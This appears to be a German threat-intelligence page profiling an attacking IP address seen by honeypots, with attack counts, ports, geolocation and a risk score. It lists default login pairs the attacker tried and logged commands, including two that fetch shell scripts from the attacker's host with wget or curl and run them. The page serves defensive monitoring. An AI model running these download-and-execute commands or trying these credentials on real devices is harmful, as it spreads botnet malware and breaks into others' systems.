Aktive BedrohungHOCH

130.12.180.85

Erste Erkennung8.2.2026
Letzte Aktivitat15.2.2026
ISPRailnet LLC
🎯
715
Gesamtangriffe
🔌
3
Ports
📡
3
Angriffsarten
🦠
3
Malware

Geolokalisierung

Land
🇺🇸 Estados Unidos
Stadt
Unbekannt
ASN
AS214943
ISP
Railnet LLC

Angriffsarten

cowrie
adbhoney
honeytrap

Angegriffene Ports

2322225555

Zugehorige Malware

Versuchte Anmeldedaten

🔐admin/admin
11x
🔐root/(leer)
11x
🔐root/root
11x
🔐user/user
8x
🔐telecomadmin/admintelecom
6x
🔐hikvision/hikvision
6x
🔐root/xc3511
6x
🔐admin/password
5x
🔐pi/raspberry
5x
🔐admin/admin1234
5x
🔐root/86981198
5x
🔐ubnt/ubnt
5x
🔐root/j1/_6s*w
5x
🔐admin/12345
5x
🔐default/default
5x

Ausgefuhrte Befehle

$./10x
$echo SHELL_TEST7x
$cat /proc6x
$/bin/busybox TEST6x
$cd /data/local/tmp/; wget http://130.12.180.85/agent.sh || curl http://130.12.180.85/agent.sh -o agent.sh; chmod 777 agent.sh; sh agent.sh android1x
$cd /data/local/tmp/; wget http://130.12.180.85/cat.sh || curl http://130.12.180.85/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android1x

Risikobewertung

72
/100
NiedrigMittelHochKritisch